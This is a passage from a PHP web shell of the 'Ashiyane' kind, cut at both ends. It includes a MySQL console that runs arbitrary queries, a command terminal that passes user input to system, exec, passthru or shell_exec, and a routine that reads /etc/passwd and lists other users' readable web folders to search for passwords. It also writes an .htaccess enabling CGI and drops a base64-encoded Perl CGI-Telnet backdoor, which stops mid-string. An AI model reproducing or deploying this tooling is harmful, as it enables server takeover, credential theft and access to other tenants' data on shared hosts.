2299 <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
2300 <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
2301 <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
2302 <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
2303 </form>
2304 </div> ";
2305 $columns = array();
2306 $msg = "<table class=\"explore\" style=\"width:99%;\">";
2307 $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);
2308 while(list($column) = @mysql_fetch_row($hasil))
2309 {
2310 $msg .= "<th>$column</th>"; $kolum = $column;
2311 }
2312 $msg .= "</tr>";
2313 $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
2314 list($total) = mysql_fetch_row($hasil);
2315 if(isset($_GET['z'])) $page = (int) $_GET['z'];
2316 else $page = 1;
2317 $pagenum = 100;
2318 $totpage = ceil($total / $pagenum);
2319 $start = (($page - 1) * $pagenum);
2320 $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
2321 while($datas = @mysql_fetch_assoc($hasil))
2322 {
2323 $msg .= "<tr>";
2324 foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; }
2325 $msg .= "</tr>";
2326 }
2327 $msg .= "</table>";
2328 $head = "<div style=\"padding:10px 0 0 6px;\">
2329 <form action=\"?\" method=\"get\">
2330 <input type=\"hidden\" name=\"action\" value=\"sql\" />
2331 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
2332 <input type=\"hidden\" name=\"x\" value=\"mysql\" />
2333 <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
2334 <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
2335 <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
2336 <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
2337 <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
2338 <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
2339 Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
2340 for($i = 1;$i <= $totpage;$i++)
2341 {
2342 $head .= "<option value=\"".$i."\">".$i."</option>";
2343 if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>";
2344 }
2345 $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
2346 $msg = $msgq.$head.$msg;
2347 }
2348 elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != ""))
2349 {
2350 $db = $_GET['db'];
2351 $query = $_GET['sqlquery'];
2352 $msg = "<div style=\"width:99%;padding:0 10px;\">
2353 <form action=\"?\" method=\"get\">
2354 <input type=\"hidden\" name=\"action\" value=\"sql\" />
2355 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
2356 <input type=\"hidden\" name=\"x\" value=\"mysql\" />
2357 <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
2358 <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
2359 <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
2360 <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
2361 <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
2362 <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
2363 <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
2364 </form>
2365 </div> ";
2366 @mysql_select_db($db);
2367 $querys = explode(";",$query);
2368 foreach($querys as $query)
2369 {
2370 if(trim($query) != "")
2371 {
2372 $hasil = mysql_query($query);
2373 if($hasil)
2374 {
2375 $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";
2376 <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
2377 $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
2378 for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";
2379 $msg .= "</tr>";
2380 for($i=0;$i<@mysql_num_rows($hasil);$i++)
2381 {
2382 $rows=@mysql_fetch_array($hasil);
2383 $msg .= "<tr>";
2384 for($j=0;$j<@mysql_num_fields($hasil);$j++)
2385 {
2386 if($rows[$j] == "") $dataz = " ";
2387 else $dataz = $rows[$j];
2388 $msg .= "<td>".$dataz."</td>";
2389 }
2390 $msg .= "</tr>";
2391 }
2392 $msg .= "</table>";
2393 }
2394 else
2395 $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query."; <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
2396 }
2397 }
2398 }
2399 else
2400 {
2401 $query = "SHOW PROCESSLIST;\n
2402 SHOW VARIABLES;\n
2403 SHOW STATUS;";
2404 $msg = "<div style=\"width:99%;padding:0 10px;\">
2405 <form action=\"?\" method=\"get\">
2406 <input type=\"hidden\" name=\"action\" value=\"sql\" />
2407 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
2408 <input type=\"hidden\" name=\"x\" value=\"mysql\" />
2409 <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
2410 <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
2411 <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
2412 <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
2413 <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
2414 <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
2415 <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
2416 </form>
2417 </div> ";
2418 $dbs = array();
2419 $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
2420 $hasil = @mysql_list_dbs($con);
2421 while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); }
2422 @sort($dbs);
2423 foreach($dbs as $db)
2424 {
2425 $msg .= "<tr><td><a href=\"?action=sql&y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."\">$db</a></td></tr>";
2426 }
2427 $msg .= "</table>";
2428 }
2429 @mysql_close($con);
2430 }
2431 else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
2432 echo $msg;
2433 }
2434
2435 else {
2436 ?>
2437
2438 <form action="?" method="get">
2439 <input type="hidden" name="action" value="sql" />
2440 <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
2441 <input type="hidden" name="x" value="mysql" />
2442 <table class="tabnet" style="width:300px;">
2443 <tr>
2444 <th colspan="2">Connect to mySQL server</th>
2445 </tr>
2446 <tr>
2447 <td> Host</td>
2448 <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td>
2449 </tr>
2450 <tr>
2451 <td> Username</td>
2452 <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td>
2453 </tr>
2454 <tr>
2455 <td> Password</td>
2456 <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="" /></td>
2457 </tr>
2458 <tr>
2459 <td> Port</td>
2460 <td><input style="width:80px;" class="inputz" type="number" name="sqlport" value="3306" min="1" max="65535"/> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
2461 </tr>
2462 </table>
2463 </form>
2464
2465<?php
2466} //end sql connector
2467
2468
2469
2470 }
2471 //terminal ~ by Mast3r 0mid
2472 if($action=="terminal"){
2473 echo "<style>#terminal{background: #A81F1F}</style>";
2474
2475$user = @get_current_user();
2476$prompt = $user." >";
2477$pwd = realpath(".")."\\";
2478function exe($cmd)
2479 {
2480 if(function_exists('system'))
2481 {
2482 @ob_start();
2483 @system($cmd);
2484 $buff = @ob_get_contents();
2485 @ob_end_clean();
2486 return $buff;
2487 }
2488 elseif(function_exists('exec'))
2489 {
2490 @exec($cmd,$results);
2491 $buff = "";
2492 foreach($results as $result)
2493 { $buff .= $result; }
2494 return $buff;
2495 }
2496 elseif(function_exists('passthru'))
2497 {
2498 @ob_start();
2499 @passthru($cmd);
2500 $buff = @ob_get_contents();
2501 @ob_end_clean();
2502 return $buff;
2503 }
2504 elseif(function_exists('shell_exec'))
2505 {
2506 $buff = @shell_exec($cmd);
2507 return $buff;
2508 }
2509 }
2510?>
2511<CENTER>
2512<form action="?action=terminal&CMD=shell#down" method="post">
2513 <table class="cmdbox">
2514 <tr>
2515 <td colspan="2">
2516 <a name="down"></a>
2517 <textarea style="width: 1000px; height: 400px;color: #FFF;background-color: #000;border: 2px solid #CE3F3F;font: 9pt Monospace,"Courier New";" class="output" readonly=""> $<?php if(isset($_POST['submitcmd'])) { echo htmlspecialchars($_POST['cmd'])."\n";}?><?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
2518 </td>
2519 </tr>
2520 <tr>
2521 <td colspan="2"><?php echo $prompt; ?>
2522 <input onMouseOver="this.focus();" id="cmd" class="input" type="text" name="cmd" style="width:60%;" value="" />
2523 <input class="inputbutn" type="submit" value="Execute !" name="submitcmd" style="width:12%;" />
2524 </td>
2525 </tr>
2526 </table>
2527 </form></CENTER>
2528
2529 <?php
2530 //end terminal
2531 }
2532 if($action=="basedir"){
2533 echo "<style>#basedir{background: #A81F1F}</style>";
2534echo '<div style="text-align:left">';
2535($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode is on</b>');
2536set_time_limit(0);
2537@$passwd = fopen('/etc/passwd','r');
2538if (!$passwd) { die('<b> <center><font color="#FFFFFF">Error : coudn`t read /etc/passwd</font></center></b>'); }
2539$pub = array();
2540$users = array();
2541$conf = array();
2542$i = 0;
2543while(!feof($passwd))
2544{
2545$str = fgets($passwd);
2546if ($i > 35)
2547{
2548$pos = strpos($str,':');
2549$username = substr($str,0,$pos);
2550$dirz = '/home/'.$username.'/public_html/';
2551if (($username != ''))
2552{
2553if (is_readable($dirz))
2554{
2555array_push($users,$username);
2556array_push($pub,$dirz);
2557}
2558}
2559}
2560$i++;
2561}
2562echo '<br><br>';
2563echo "<b><font color=\"#00A220\">Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br /></font></b>";
2564echo "<b><font color=\"#00A220\">Founded ".sizeof($pub)." readable public_html directories\n"."<br /></font></b>";
2565echo "<b><font color=\"#FFFFFF\">Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
2566foreach ($users as $user)
2567{
2568$p4th = "/home/$user/public_html/";
2569echo "<form method=get><span>Change Dir : <b><font color=\"#CE3F3F\">$user</font></b></span><br><input type='hidden' name='action' value='explorer'><input type=text name=dir value='$p4th'><input type=submit value='>>'></form><br>";
2570}
2571echo '<br><br></b>';
2572echo '</div>';
2573
2574
2575 }
2576
2577
2578 if($action=="cgiashiyane"){
2579 echo "<style>#cgiashiyane{background: #A81F1F}</style>";
2580if (!file_exists("cgiashiyane") && !is_dir("cgiashiyane")) {
2581 mkdir('cgiashiyane',0755);
2582}
2583chdir('cgiashiyane');
2584$ashiyane1 = '.htaccess';
2585$ashiyane2 = "$ashiyane1";
2586$ashiyane3 = fopen ($ashiyane2 ,'w') or die ('ERROR!!!');
2587$ashiyane4 = 'Options FollowSymLinks MultiViews Indexes ExecCGI
2588AddType application/x-httpd-cgi .ashiyane
2589AddHandler cgi-script .ashiyane
2590AddHandler cgi-script .ashiyane';
2591fwrite ( $ashiyane3 ,$ashiyane4 ) ;
2592fclose ($ashiyane3);
2593$ashiyane5 = " IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBDb3B5cmlnaHQgYW5kIExpY2VuY2UNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ0dJLVRlbG5ldCBWZXJzaW9uIDEuMCBmb3IgTlQgYW5kIFVuaXggOiBSdW4gQ29tbWFuZHMgb24geW91ciBXZWIgU2VydmVyDQojDQojIENvcHlyaWdodCAoQykgMjAwMSBSb2hpdGFiIEJhdHJhDQojIFBlcm1pc3Npb24gaXMgZ3JhbnRlZCB0byB1c2UsIGRpc3RyaWJ1dGUgYW5kIG1vZGlmeSB0aGlzIHNjcmlwdCBzbyBsb25nDQojIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZSBpcyBsZWZ0IGludGFjdC4gSWYgeW91IG1ha2UgY2hhbmdlcyB0byB0aGUgc2NyaXB0DQojIHBsZWFzZSBkb2N1bWVudCB0aGVtIGFuZCBpbmZvcm0gbWUuIElmIHlvdSB3b3VsZCBsaWtlIGFueSBjaGFuZ2VzIHRvIGJlIG1hZGUNCiMgaW4gdGhpcyBzY3JpcHQsIHlvdSBjYW4gZS1tYWlsIG1lLg0KIw0KIyBBdXRob3I6IFJvaGl0YWIgQmF0cmENCiMgQXV0aG9yIGUtbWFpbDogcm9oaXRhYkByb2hpdGFiLmNvbQ0KIyBBdXRob3IgSG9tZXBhZ2U6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vDQojIFNjcmlwdCBIb21lcGFnZTogbWFpbHRvOlVOSVRYX1RFQU1ASE9UTUFJTC5DT00NCiMgUHJvZHVjdCBTdXBwb3J0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL3N1cHBvcnQvDQojIERpc2N1c3Npb24gRm9ydW06IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vZGlzY3Vzcy8NCiMgTWFpbGluZyBMaXN0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL21saXN0Lw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEluc3RhbGxhdGlvbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUbyBpbnN0YWxsIHRoaXMgc2NyaXB0DQojDQojIDEuIE1vZGlmeSB0aGUgZmlyc3QgbGluZSAiIyEvdXNyL2Jpbi9wZXJsIiB0byBwb2ludCB0byB0aGUgY29ycmVjdCBwYXRoIG9uDQojICAgIHlvdXIgc2VydmVyLiBGb3IgbW9zdCBzZXJ2ZXJzLCB5b3UgbWF5IG5vdCBuZWVkIHRvIG1vZGlmeSB0aGlzLg0KIyAyLiBDaGFuZ2UgdGhlIHBhc3N3b3JkIGluIHRoZSBDb25maWd1cmF0aW9uIHNlY3Rpb24gYmVsb3cuDQojIDMuIElmIHlvdSdyZSBydW5uaW5nIHRoZSBzY3JpcHQgdW5kZXIgV2luZG93cyBOVCwgc2V0ICRXaW5OVCA9IDEgaW4gdGhlDQojICAgIENvbmZpZ3VyYXRpb24gU2VjdGlvbiBiZWxvdy4NCiMgNC4gVXBsb2FkIHRoZSBzY3JpcHQgdG8gYSBkaXJlY3Rvcnkgb24geW91ciBzZXJ2ZXIgd2hpY2ggaGFzIHBlcm1pc3Npb25zIHRvDQojICAgIGV4ZWN1dGUgQ0dJIHNjcmlwdHMuIFRoaXMgaXMgdXN1YWxseSBjZ2ktYmluLiBNYWtlIHN1cmUgdGhhdCB5b3UgdXBsb2FkDQojICAgIHRoZSBzY3JpcHQgaW4gQVNDSUkgbW9kZS4NCiMgNS4gQ2hhbmdlIHRoZSBwZXJtaXNzaW9uIChDSE1PRCkgb2YgdGhlIHNjcmlwdCB0byA3NTUuDQojIDYuIE9wZW4gdGhlIHNjcmlwdCBpbiB5b3VyIHdlYiBicm93c2VyLiBJZiB5b3UgdXBsb2FkZWQgdGhlIHNjcmlwdCBpbg0KIyAgICBjZ2ktYmluLCB0aGlzIHNob3VsZCBiZSBodHRwOi8vd3d3LnlvdXJzZXJ2ZXIuY29tL2NnaS1iaW4vY2dpdGVsbmV0LnBsDQojIDcuIExvZ2luIHVzaW5nIHRoZSBwYXNzd29yZCB0aGF0IHlvdSBzcGVjaWZpZWQgaW4gU3RlcCAyLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIENvbmZpZ3VyYXRpb246IFlvdSBuZWVkIHRvIGNoYW5nZSBvbmx5ICRQYXNzd29yZCBhbmQgJFdpbk5ULiBUaGUgb3RoZXINCiMgdmFsdWVzIHNob3VsZCB3b3JrIGZpbmUgZm9yIG1vc3Qgc3lzdGVtcy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCgkJIyBDaGFuZ2UgdGhpcy4gWW91IHdpbGwgbmVlZCB0byBlbnRlciB0aGlzDQoJCQkJIyB0byBsb2dpbi4NCg0KJFdpbk5UID0gMDsJCQkjIFlvdSBuZWVkIHRvIGNoYW5nZSB0aGUgdmFsdWUgb2YgdGhpcyB0byAxIGlmDQoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQNCgkJCQkjIG1hY2hpbmUuIElmIHlvdSdyZSBydW5uaW5nIGl0IG9uIFVuaXgsIHlvdQ0KCQkJCSMgY2FuIGxlYXZlIHRoZSB2YWx1ZSBhcyBpdCBpcy4NCg0KJE5UQ21kU2VwID0gIiYiOwkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFdpbmRvd3MgTlQuDQoNCiRVbml4Q21kU2VwID0gIjsiOwkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFVuaXguDQoNCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkDQoJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMNCgkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0DQoJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLg0KCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMNCgkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4NCg0KJFNob3dEeW5hbWljT3V0cHV0ID0gMTsJCSMgSWYgdGhpcyBpcyAxLCB0aGVuIGRhdGEgaXMgc2VudCB0byB0aGUNCgkJCQkjIGJyb3dzZXIgYXMgc29vbiBhcyBpdCBpcyBvdXRwdXQsIG90aGVyd2lzZQ0KCQkJCSMgaXQgaXMgYnVmZmVyZWQgYW5kIHNlbmQgd2hlbiB0aGUgY29tbWFuZA0KCQkJCSMgY29tcGxldGVzLiBUaGlzIGlzIHVzZWZ1bCBmb3IgY29tbWFuZHMgbGlrZQ0KCQkJCSMgcGluZywgc28gdGhhdCB5b3UgY2FuIHNlZSB0aGUgb3V0cHV0IGFzIGl0DQoJCQkJIyBpcyBiZWluZyBnZW5lcmF0ZWQuDQoNCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISENCg0KJENtZFNlcCA9ICgkV2luTlQgPyAkTlRDbWRTZXAgOiAkVW5peENtZFNlcCk7DQokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7DQokUGF0aFNlcCA9ICgkV2luTlQgPyAiXFwiIDogIi8iKTsNCiRSZWRpcmVjdG9yID0gKCRXaW5OVCA/ICIgMj4mMSAxPiYyIiA6ICIgMT4mMSAyPiYxIik7DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUmVhZHMgdGhlIGlucHV0IHNlbnQgYnkgdGhlIGJyb3dzZXIgYW5kIHBhcnNlcyB0aGUgaW5wdXQgdmFyaWFibGVzLiBJdA0KIyBwYXJzZXMgR0VULCBQT1NUIGFuZCBtdWx0aXBhcnQvZm9ybS1kYXRhIHRoYXQgaXMgdXNlZCBmb3IgdXBsb2FkaW5nIGZpbGVzLg0KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9Lg0KIyBPdGhlciB2YXJpYWJsZXMgY2FuIGJlIGFjY2Vzc2VkIHVzaW5nICRpbnsndmFyJ30sIHdoZXJlIHZhciBpcyB0aGUgbmFtZSBvZg0KIyB0aGUgdmFyaWFibGUuIE5vdGU6IE1vc3Qgb2YgdGhlIGNvZGUgaW4gdGhpcyBmdW5jdGlvbiBpcyB0YWtlbiBmcm9tIG90aGVyIENHSQ0KIyBzY3JpcHRzLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFJlYWRQYXJzZSANCnsNCglsb2NhbCAoKmluKSA9IEBfIGlmIEBfOw0KCWxvY2FsICgkaSwgJGxvYywgJGtleSwgJHZhbCk7DQoJDQoJJE11bHRpcGFydEZvcm1EYXRhID0gJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC87DQoNCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQ0KCXsNCgkJJGluID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQoJfQ0KCWVsc2lmKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgIlBPU1QiKQ0KCXsNCgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOw0KCQlyZWFkKFNURElOLCAkaW4sICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KCX0NCg0KCSMgaGFuZGxlIGZpbGUgdXBsb2FkIGRhdGENCglpZigkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLykNCgl7DQoJCSRCb3VuZGFyeSA9ICctLScuJDE7ICMgcGxlYXNlIHJlZmVyIHRvIFJGQzE4NjcgDQoJCUBsaXN0ID0gc3BsaXQoLyRCb3VuZGFyeS8sICRpbik7IA0KCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOw0KCQkkSGVhZGVyQm9keSA9fiAvXHJcblxyXG58XG5cbi87DQoJCSRIZWFkZXIgPSAkYDsNCgkJJEJvZHkgPSAkJzsNCiAJCSRCb2R5ID1+IHMvXHJcbiQvLzsgIyB0aGUgbGFzdCBcclxuIHdhcyBwdXQgaW4gYnkgTmV0c2NhcGUNCgkJJGlueydmaWxlZGF0YSd9ID0gJEJvZHk7DQoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgDQoJCSRpbnsnZid9ID0gJDE7IA0KCQkkaW57J2YnfSA9fiBzL1wiLy9nOw0KCQkkaW57J2YnfSA9fiBzL1xzLy9nOw0KDQoJCSMgcGFyc2UgdHJhaWxlcg0KCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQ0KCQl7IA0KCQkJJGxpc3RbJGldID1+IHMvXi4rbmFtZT0kLy87DQoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87DQoJCQkka2V5ID0gJDE7DQoJCQkkdmFsID0gJCc7DQoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOw0KCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSRpbnska2V5fSA9ICR2YWw7IA0KCQl9DQoJfQ0KCWVsc2UgIyBzdGFuZGFyZCBwb3N0IGRhdGEgKHVybCBlbmNvZGVkLCBub3QgbXVsdGlwYXJ0KQ0KCXsNCgkJQGluID0gc3BsaXQoLyYvLCAkaW4pOw0KCQlmb3JlYWNoICRpICgwIC4uICQjaW4pDQoJCXsNCgkJCSRpblskaV0gPX4gcy9cKy8gL2c7DQoJCQkoJGtleSwgJHZhbCkgPSBzcGxpdCgvPS8sICRpblskaV0sIDIpOw0KCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gLj0gIlwwIiBpZiAoZGVmaW5lZCgkaW57JGtleX0pKTsNCgkJCSRpbnska2V5fSAuPSAkdmFsOw0KCQl9DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcg0KIyBBcmd1bWVudCAxOiBGb3JtIGl0ZW0gbmFtZSB0byB3aGljaCBmb2N1cyBzaG91bGQgYmUgc2V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlSGVhZGVyDQp7DQoJJEVuY29kZWRDdXJyZW50RGlyID0gJEN1cnJlbnREaXI7DQoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCglwcmludCAiQ29udGVudC10eXBlOiB0ZXh0L2h0bWxcblxuIjsNCglwcmludCA8PEVORDsNCjxodG1sPg0KPGhlYWQ+DQo8dGl0bGU+QXNoaXlhbmU8L3RpdGxlPg0KJEh0bWxNZXRhSGVhZGVyDQo8L2hlYWQ+DQo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzAwMDAwMCIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4NCjx0YWJsZSBib3JkZXI9IjEiIHdpZHRoPSIxMDAlIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjIiPg0KPHRyPg0KPHRkIGJnY29sb3I9IiNDMkJGQTUiIGJvcmRlcmNvbG9yPSIjMDAwMDgwIiBhbGlnbj0iY2VudGVyIj4NCjxiPjxmb250IGNvbG9yPSIjMDAwMDgwIiBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0KPHRkIGJnY29sb3I9IiMwMDAwODAiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNpemU9IjIiIGNvbG9yPSIjMDA5OTAwIj48Yj5DR0ktVGVsbmV0IEFzaGl5YW5lIENvbm5lY3RlZCB0byAkU2VydmVyTmFtZTwvYj48L2ZvbnQ+PC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQgY29sc3Bhbj0iMiIgYmdjb2xvcj0iI0MyQkZBNSI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+DQo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT11cGxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPlVwbG9hZCBGaWxlPC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWxvZ291dCI+RGlzY29ubmVjdDwvYT4gfA0KPGEgaH